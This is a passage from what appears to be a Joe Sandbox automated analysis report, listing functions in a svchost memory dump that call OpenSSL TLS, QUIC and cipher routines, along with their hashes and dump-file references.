                                                                                              • OPENSSL_LH_set_thunks.LIBCRYPTO-3-X64(?,00007FFBAB45AD25,?,00007FFBAB4523E0), ref: 00007FFBAB45A9D8
                                                                                              • OPENSSL_LH_free.LIBCRYPTO-3-X64(?,00007FFBAB45AD25,?,00007FFBAB4523E0), ref: 00007FFBAB45A9F6
                                                                                              • OPENSSL_LH_free.LIBCRYPTO-3-X64(?,00007FFBAB45AD25,?,00007FFBAB4523E0), ref: 00007FFBAB45A9FF
                                                                                              • CRYPTO_free.LIBCRYPTO-3-X64(?,00007FFBAB45AD25,?,00007FFBAB4523E0), ref: 00007FFBAB45AA14
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_freeH_newH_set_thunks$O_freeO_zalloc
                                                                                              • String ID: ssl\quic\quic_lcidm.c
                                                                                              • API String ID: 1806772546-3923830422
                                                                                              • Opcode ID: 2eb3d8455a65ec606cb78af399c6bd19ff677b15e37c08fd1a01727ef15f76e6
                                                                                              • Instruction ID: c4c97f86f7a32db8212884cd8e8987b371f825767ccceb98dd7f7e63d44b2929
                                                                                              • Opcode Fuzzy Hash: 2eb3d8455a65ec606cb78af399c6bd19ff677b15e37c08fd1a01727ef15f76e6
                                                                                              • Instruction Fuzzy Hash: 56311AA1A0AB6695EA12DB35E8410B87360FF44B84F44C536DD6D4B3B6EF3CE949C380
                                                                                              Function 00007FFBAB478B90 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 55COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • BIO_free.LIBCRYPTO-3-X64(-0000001F,00007FFBAB4769C0,?,00007FFBAB472462), ref: 00007FFBAB478BB4
                                                                                              • BIO_free.LIBCRYPTO-3-X64(-0000001F,00007FFBAB4769C0,?,00007FFBAB472462), ref: 00007FFBAB478BBD
                                                                                              • BIO_free.LIBCRYPTO-3-X64(-0000001F,00007FFBAB4769C0,?,00007FFBAB472462), ref: 00007FFBAB478BC6
                                                                                              • CRYPTO_free.LIBCRYPTO-3-X64(-0000001F,00007FFBAB4769C0,?,00007FFBAB472462), ref: 00007FFBAB478BDF
                                                                                              • EVP_CIPHER_CTX_free.LIBCRYPTO-3-X64(-0000001F,00007FFBAB4769C0,?,00007FFBAB472462), ref: 00007FFBAB478C05
                                                                                              • EVP_MD_CTX_free.LIBCRYPTO-3-X64(-0000001F,00007FFBAB4769C0,?,00007FFBAB472462), ref: 00007FFBAB478C11
                                                                                              • OPENSSL_cleanse.LIBCRYPTO-3-X64(-0000001F,00007FFBAB4769C0,?,00007FFBAB472462), ref: 00007FFBAB478C35
                                                                                              • CRYPTO_free.LIBCRYPTO-3-X64(-0000001F,00007FFBAB4769C0,?,00007FFBAB472462), ref: 00007FFBAB478C60
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_free$X_free$L_cleanse
                                                                                              • String ID: ssl\record\methods\tls_common.c
                                                                                              • API String ID: 3857070794-847517130
                                                                                              • Opcode ID: 16ae880bbcd7f4f12206f7fb58f8a980b4d9ceb1a77b75ec99dd5c3ccc35a193
                                                                                              • Instruction ID: 6da75c0ba69b68ca52b770ebe39fd5199cd771ce41a8aa85df5fd677d0c3d10b
                                                                                              • Opcode Fuzzy Hash: 16ae880bbcd7f4f12206f7fb58f8a980b4d9ceb1a77b75ec99dd5c3ccc35a193
                                                                                              • Instruction Fuzzy Hash: 22215672B5AA4185EB21EB35E8852FD6725FB84B80F048035EFAE43766DE3CE545C701
                                                                                              Function 00007FFBAB47EFA0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 105COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debug$O_mallocmemcpy
                                                                                              • String ID: ssl\statem\extensions_clnt.c$tls_construct_ctos_session_ticket
                                                                                              • API String ID: 1077327330-1875783020
                                                                                              • Opcode ID: 1596e0af75f30e872f9208defff7981b8469c0809c04e29b16abea55fd6c7c34
                                                                                              • Instruction ID: 99b6b899c46438cd1c2530dd1b7a8df6b061a01de580d57d66e2e072ff349b33
                                                                                              • Opcode Fuzzy Hash: 1596e0af75f30e872f9208defff7981b8469c0809c04e29b16abea55fd6c7c34
                                                                                              • Instruction Fuzzy Hash: AB416DA2A1A6C281FB669B35D4817B923A0EB44B84F04C436DE2D437B5CF7CE995C341
                                                                                              Function 00007FFBAB43CB80 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 99COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ERR_new.LIBCRYPTO-3-X64(?,?,?,00007FFBAB443E97,?,00007FFBAB417BE9), ref: 00007FFBAB43CBB8
                                                                                              • ERR_set_debug.LIBCRYPTO-3-X64(?,?,?,00007FFBAB443E97,?,00007FFBAB417BE9), ref: 00007FFBAB43CBD0
                                                                                              • ERR_set_error.LIBCRYPTO-3-X64(?,?,?,00007FFBAB443E97,?,00007FFBAB417BE9), ref: 00007FFBAB43CBE0
                                                                                              • CRYPTO_malloc.LIBCRYPTO-3-X64(?,?,?,00007FFBAB443E97,?,00007FFBAB417BE9), ref: 00007FFBAB43CC0C
                                                                                              • CRYPTO_free.LIBCRYPTO-3-X64(?,?,?,00007FFBAB443E97,?,00007FFBAB417BE9), ref: 00007FFBAB43CC77
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_freeO_mallocR_newR_set_debugR_set_error
                                                                                              • String ID: ssl\t1_lib.c$tls1_set_groups
                                                                                              • API String ID: 3444577743-501428225
                                                                                              • Opcode ID: 3387ba08c0ef94040f6f763e6a0fa10ff7a0d40c00e755005ab5945b47214827
                                                                                              • Instruction ID: 62a9511f52ffcf49e17a07745f437cfe13bea401871b7c34a06b025d5d9fbd31
                                                                                              • Opcode Fuzzy Hash: 3387ba08c0ef94040f6f763e6a0fa10ff7a0d40c00e755005ab5945b47214827
                                                                                              • Instruction Fuzzy Hash: BE41D2B3A0A75682EB12DB26E4406BA6391FF44784F488431EE1D83BA5EE3DD656C700
                                                                                              Function 00007FFBAB412460 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 71COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_freeO_mallocO_zalloc
                                                                                              • String ID: crypto\thread\arch\thread_win.c
                                                                                              • API String ID: 3820030834-2915021490
                                                                                              • Opcode ID: c37737e365c2ce0626f2e2ceccc942b4325635cc8ce8ee4579d867cc04c18adb
                                                                                              • Instruction ID: 3507dce07dec5d7acd84757818f886a6d6c73d9003cf23d91d9643ab0a839dbe
                                                                                              • Opcode Fuzzy Hash: c37737e365c2ce0626f2e2ceccc942b4325635cc8ce8ee4579d867cc04c18adb
                                                                                              • Instruction Fuzzy Hash: F421F0B1B1AB5281EB66CB36F85167826E0AF09B88F049139CD2D877A4EF3CE0508700
                                                                                              Function 00007FFBAB45A2C0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 63COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CRYPTO_zalloc.LIBCRYPTO-3-X64(?,00007FFBAB45A567,?,?,?,?,?,00007FFBAB45A862,00007FFBAB44C589), ref: 00007FFBAB45A310
                                                                                              • OPENSSL_LH_insert.LIBCRYPTO-3-X64(?,00007FFBAB45A567,?,?,?,?,?,00007FFBAB45A862,00007FFBAB44C589), ref: 00007FFBAB45A33B
                                                                                              • OPENSSL_LH_error.LIBCRYPTO-3-X64(?,00007FFBAB45A567,?,?,?,?,?,00007FFBAB45A862,00007FFBAB44C589), ref: 00007FFBAB45A344
                                                                                              • OPENSSL_LH_insert.LIBCRYPTO-3-X64(?,00007FFBAB45A567,?,?,?,?,?,00007FFBAB45A862,00007FFBAB44C589), ref: 00007FFBAB45A354
                                                                                              • OPENSSL_LH_error.LIBCRYPTO-3-X64(?,00007FFBAB45A567,?,?,?,?,?,00007FFBAB45A862,00007FFBAB44C589), ref: 00007FFBAB45A35D
                                                                                              • OPENSSL_LH_delete.LIBCRYPTO-3-X64(?,00007FFBAB45A567,?,?,?,?,?,00007FFBAB45A862,00007FFBAB44C589), ref: 00007FFBAB45A36D
                                                                                              • CRYPTO_free.LIBCRYPTO-3-X64(?,00007FFBAB45A567,?,?,?,?,?,00007FFBAB45A862,00007FFBAB44C589), ref: 00007FFBAB45A382
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_errorH_insert$H_deleteO_freeO_zalloc
                                                                                              • String ID: ssl\quic\quic_lcidm.c
                                                                                              • API String ID: 190680123-3923830422
                                                                                              • Opcode ID: eeceed8d67f2690089884639a528604250089903e4d745cf7e1d1ce9f3735ef8
                                                                                              • Instruction ID: 2214a30fc4d3aeef3a1d82aadd60267fdd9f0cd13211496cdee13c1a4411fa36
                                                                                              • Opcode Fuzzy Hash: eeceed8d67f2690089884639a528604250089903e4d745cf7e1d1ce9f3735ef8
                                                                                              • Instruction Fuzzy Hash: 1C2192A1B0AB8185E762DB36E44117D6760EB84BC0F048535EFAD47BA6DF2CE9908710
                                                                                              Function 00007FFBAB430EF0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 63COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_freeO_mallocR_newR_set_debugR_set_errormemcpy
                                                                                              • String ID: SSL_CTX_use_serverinfo_ex$ssl\ssl_rsa.c
                                                                                              • API String ID: 3414495729-2805076526
                                                                                              • Opcode ID: 6dd5d207ab8fdcb36cad2fb8970ce0cc5b2169a5e553794debd27d2ab7c40b17
                                                                                              • Instruction ID: 6a898a2bfde6d6f88e2f31b62a4b61b4188bdf7749154eea2d54308d66c960c2
                                                                                              • Opcode Fuzzy Hash: 6dd5d207ab8fdcb36cad2fb8970ce0cc5b2169a5e553794debd27d2ab7c40b17
                                                                                              • Instruction Fuzzy Hash: A821C5A271AA4185EB52DB22E4912FE6760EF887C4F48C035FE6D47BAADE3DD5448700
                                                                                              Function 00007FFBAB4902C0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 117COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_free$O_mallocO_zallocmemcpy
                                                                                              • String ID: ssl\statem\statem_dtls.c
                                                                                              • API String ID: 2462724457-3166991913
                                                                                              • Opcode ID: 90f33b9d4b48c744c714bce5c65b5c8c6e3ade802c3c2a19bb8dfdd2f96a43ba
                                                                                              • Instruction ID: 03a3fd1c70414e13ae10d0231c5438d10e5d758b036394e69b1852dc75c9dc0f
                                                                                              • Opcode Fuzzy Hash: 90f33b9d4b48c744c714bce5c65b5c8c6e3ade802c3c2a19bb8dfdd2f96a43ba
                                                                                              • Instruction Fuzzy Hash: 59519CB260AA4186EB26CF36D4903AD77A0FB48B88F048436DF9D47365DF38E561C300
                                                                                              Function 00007FFBAB498426 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 104COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ERR_new.LIBCRYPTO-3-X64 ref: 00007FFBAB49DD7A
                                                                                              • ERR_set_debug.LIBCRYPTO-3-X64 ref: 00007FFBAB49DD92
                                                                                              • CRYPTO_clear_free.LIBCRYPTO-3-X64 ref: 00007FFBAB49DE90
                                                                                                • Part of subcall function 00007FFBAB49C5A0: ERR_new.LIBCRYPTO-3-X64(?,?,00007FFBAB49DD65), ref: 00007FFBAB49C62D
                                                                                                • Part of subcall function 00007FFBAB49C5A0: ERR_set_debug.LIBCRYPTO-3-X64(?,?,00007FFBAB49DD65), ref: 00007FFBAB49C645
                                                                                                • Part of subcall function 00007FFBAB419F90: CRYPTO_malloc.LIBCRYPTO-3-X64 ref: 00007FFBAB41A012
                                                                                                • Part of subcall function 00007FFBAB419F90: memset.VCRUNTIME140 ref: 00007FFBAB41A040
                                                                                                • Part of subcall function 00007FFBAB419F90: memcpy.VCRUNTIME140 ref: 00007FFBAB41A075
                                                                                                • Part of subcall function 00007FFBAB419F90: CRYPTO_clear_free.LIBCRYPTO-3-X64 ref: 00007FFBAB41A091
                                                                                                • Part of subcall function 00007FFBAB419F90: CRYPTO_clear_free.LIBCRYPTO-3-X64 ref: 00007FFBAB41A0EA
                                                                                                • Part of subcall function 00007FFBAB419F90: CRYPTO_clear_free.LIBCRYPTO-3-X64 ref: 00007FFBAB41A162
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_clear_free$R_newR_set_debug$O_mallocmemcpymemset
                                                                                              • String ID: ssl\statem\statem_srvr.c$tls_process_client_key_exchange
                                                                                              • API String ID: 1067245891-2683773349
                                                                                              • Opcode ID: 1c0b79c31e8a9f3943a6edc68d542a649b7dabfdcd0a743967adedc52196357a
                                                                                              • Instruction ID: 94869669fa705eb018ef65ffb2b625f394d20e185a3f4d2275cc346fe2cd98e5
                                                                                              • Opcode Fuzzy Hash: 1c0b79c31e8a9f3943a6edc68d542a649b7dabfdcd0a743967adedc52196357a
                                                                                              • Instruction Fuzzy Hash: 074162F1E5EA4351FAA69A36E8813BD1651AF54BC0F48D431DE2E477FACE2CE4518300
                                                                                              Function 00007FFBAB4722F0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 95COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_free$O_write_ex
                                                                                              • String ID: ssl\record\methods\dtls_meth.c
                                                                                              • API String ID: 4226350071-3591241555
                                                                                              • Opcode ID: bde0cab8d0c369b78131248d5be2cbc1ed3454a649133427173d6e401b38db80
                                                                                              • Instruction ID: 7b45adbedbc9e7934165224e3e85dca110e139cf8ff5ad91fbad880eb59bd7cd
                                                                                              • Opcode Fuzzy Hash: bde0cab8d0c369b78131248d5be2cbc1ed3454a649133427173d6e401b38db80
                                                                                              • Instruction Fuzzy Hash: 1E4180B1B0AA8282EE16EB72E4412B96360FF89BC4F448032DE6C47775DF2CE495C740
                                                                                              Function 00007FFBAB42BC10 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 74COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_freeO_strdupR_newR_set_debugR_set_error
                                                                                              • String ID: SSL_use_psk_identity_hint$ssl\ssl_lib.c
                                                                                              • API String ID: 598019968-2430927796
                                                                                              • Opcode ID: 1ea449a0176887930c424f68ffd28c0cbadf460d2bd31b526b59dad1a35b383e
                                                                                              • Instruction ID: 52f571c64d86579a5371407c939980da66ba97ea0819128dbbecb986dce3aea4
                                                                                              • Opcode Fuzzy Hash: 1ea449a0176887930c424f68ffd28c0cbadf460d2bd31b526b59dad1a35b383e
                                                                                              • Instruction Fuzzy Hash: 4431D2A1F1AA4285FB92CB36D4813BC33A0DF84B80F589035DE2C8B7B5DE2ED4858701
                                                                                              Function 00007FFBAB4568B0 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 203COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_freeO_zallocR_newR_set_debugR_vset_error
                                                                                              • String ID: @$create_channel$ossl_quic_new$ssl\quic\quic_impl.c
                                                                                              • API String ID: 1707950466-414960852
                                                                                              • Opcode ID: dfe8ce2f5f752a5847011871b0bfa246798d21550bca569168ae90550036ef29
                                                                                              • Instruction ID: a68a1129afdc29575989c094ae617e94fbb143d035cbc59f5af2b3d1e2176c55
                                                                                              • Opcode Fuzzy Hash: dfe8ce2f5f752a5847011871b0bfa246798d21550bca569168ae90550036ef29
                                                                                              • Instruction Fuzzy Hash: 57A173B2A0AB4281FB62DF35E4406AD67A4FB84B84F548236DEAD47769DF3CD940C740
                                                                                              Function 00007FFBAB45C210 Relevance: 10.7, APIs: 7, Instructions: 187COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • EVP_CIPHER_CTX_get_iv_length.LIBCRYPTO-3-X64(?,00000031,00000000,00000000,?,00000001,-00000128,?,00007FFBAB45CD0E,00000000,?,00000000,?,?,00000000,00000000), ref: 00007FFBAB45C37A
                                                                                              • memcpy.VCRUNTIME140(?,00000031,00000000,00000000,?,00000001,-00000128,?,00007FFBAB45CD0E,00000000,?,00000000,?,?,00000000,00000000), ref: 00007FFBAB45C39E
                                                                                              • EVP_CipherInit_ex.LIBCRYPTO-3-X64(?,00000031,00000000,00000000,?,00000001,-00000128,?,00007FFBAB45CD0E,00000000,?,00000000,?,?,00000000,00000000), ref: 00007FFBAB45C410
                                                                                              • EVP_CIPHER_CTX_ctrl.LIBCRYPTO-3-X64(?,00000031,00000000,00000000,?,00000001,-00000128,?,00007FFBAB45CD0E,00000000,?,00000000,?,?,00000000,00000000), ref: 00007FFBAB45C432
                                                                                              • EVP_CipherUpdate.LIBCRYPTO-3-X64(?,00000031,00000000,00000000,?,00000001,-00000128,?,00007FFBAB45CD0E,00000000,?,00000000,?,?,00000000,00000000), ref: 00007FFBAB45C450
                                                                                              • EVP_CipherUpdate.LIBCRYPTO-3-X64(?,00000031,00000000,00000000,?,00000001,-00000128,?,00007FFBAB45CD0E,00000000,?,00000000,?,?,00000000,00000000), ref: 00007FFBAB45C473
                                                                                              • EVP_CipherFinal_ex.LIBCRYPTO-3-X64(?,00000031,00000000,00000000,?,00000001,-00000128,?,00007FFBAB45CD0E,00000000,?,00000000,?,?,00000000,00000000), ref: 00007FFBAB45C487
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: Cipher$Update$Final_exInit_exX_ctrlX_get_iv_lengthmemcpy
                                                                                              • String ID:
                                                                                              • API String ID: 1713099526-0
                                                                                              • Opcode ID: ae4966a4ba86e44269781f7c9de355cd7975bb776e5f628b99d2519fa1978a93
                                                                                              • Instruction ID: e73b43737626a31c7686b705221400d281be8eec1c72b12a5ed9cc931c060e85
                                                                                              • Opcode Fuzzy Hash: ae4966a4ba86e44269781f7c9de355cd7975bb776e5f628b99d2519fa1978a93
                                                                                              • Instruction Fuzzy Hash: 3E711572A1EB9582EB22DB39D440ABE7761FB86784F048535DE9D43B6ADE3CE450C700
                                                                                              Function 00007FFBAB44A330 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
